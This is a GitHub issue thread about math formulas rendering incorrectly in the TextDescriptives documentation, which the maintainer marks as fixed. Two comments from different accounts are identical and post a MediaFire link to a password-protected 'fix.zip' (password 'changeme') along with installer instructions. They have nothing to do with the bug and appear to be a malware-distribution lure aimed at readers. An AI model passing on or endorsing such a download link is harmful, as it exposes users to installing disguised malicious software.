### ISSUE TITLE
Formulas in docs renders incorrectly

### ISSUE THREAD

**Issue by KennethEnevoldsen** [HLasse/TextDescriptives#360]
Formulas in docs renders incorrectly.

## Which page or section is this issue related to?

https://hlasse.github.io/TextDescriptives/information_theory.html

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KennethEnevoldsen** [comment]
Fixed!
